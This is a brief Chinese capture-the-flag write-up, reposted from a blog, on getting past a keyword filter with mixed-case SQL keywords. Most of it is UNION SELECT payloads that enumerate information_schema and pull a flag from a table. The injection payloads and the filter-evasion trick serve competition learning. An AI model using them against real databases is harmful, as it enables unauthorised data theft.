安恒杯-绕过看门狗

1. 输入and 1=1发现非法提示

通过大小写混淆可以绕过

2. 经测试,发现有5个字段

3. 查数据库和当前用户

4. 查表

UniOn SelEct 1,(SelEct Table_Name fROm InfOrMation_sChema.tAbles WhEre tAble_sChema='news' lImit 1,1),3,4,5#

5. 查表中字段

UniOn Select 1,(SelecT ColuMn_Name FrOm InFOrMation_sChema.COluMns WherE TaBle_NaMe='tb_flag' liMit 0,1),3,4,5#

5. 查内容

UniOn Select 1,(SelecT flag FrOm news.tb_flag),3,4,5#

本文固定链接:http://www.cnblogs.com/hell0w/p/8119659.html

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/hell0w/p/8119659.html